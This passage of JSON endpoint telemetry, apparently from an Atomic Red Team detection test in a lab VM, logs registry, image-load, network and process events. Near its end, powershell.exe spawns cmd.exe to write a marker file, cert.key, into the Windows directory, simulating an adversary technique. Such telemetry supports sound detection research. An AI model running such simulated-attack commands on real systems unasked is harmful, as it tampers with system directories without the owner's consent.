Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1809.2731.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d492a8eca\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570942619984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570943240000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d5ed8621\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d5ed8621\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570943400000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570943869984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d3d24015d40ec6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Xbox.TCUI_1.11.28003.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d3d24015d40ec6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570943869984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570944960000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed99b68f26\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed99b68f26\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570944960000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570946369984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c9ee9ce45\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxSpeechToTextOverlay_1.21.13002.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c9ee9ce45\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570946369984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570946680000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8a574905\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.18102.10531.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8a574905\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570946680000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570946990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d11cfb971\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d11cfb971\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570946990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri", - "registry_value": "C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri", - "timestamp": 131883570947150000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware 
Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\\1d3d1edc24bc16f\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\\1d3d1edc24bc16f\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570947150000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "file", - "file_name": "SVCHOST.EXE-7F44DDFD.pf", - "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-7F44DDFD.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570978250000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "destination_address": "192.168.162.255", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "137", - "subtype": "outgoing", - "timestamp": 131883570966190000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.134", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.255", - "source_port": "137", - "subtype": "incoming", - "timestamp": 131883570966190000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 6292, - "process_name": "net.exe", - 
"process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": 
"C:\\Windows\\System32\\combase.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc6.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "webio.dll", - "image_path": "C:\\Windows\\System32\\webio.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": 
"{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", 
- "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "file", - "file_name": "NET.EXE-1DF3A2F6.pf", - "file_path": "C:\\Windows\\Prefetch\\NET.EXE-1DF3A2F6.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571010740000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "terminate", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "process", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "process", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2812, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571011820000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": 
"C:\\Windows\\System32\\cmd.exe", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011830000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011830000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011830000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "process", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571011830000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"echo \" \"ATOMICREDTEAM > %%windir%%\\cert.key\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3668, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571013970000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { 
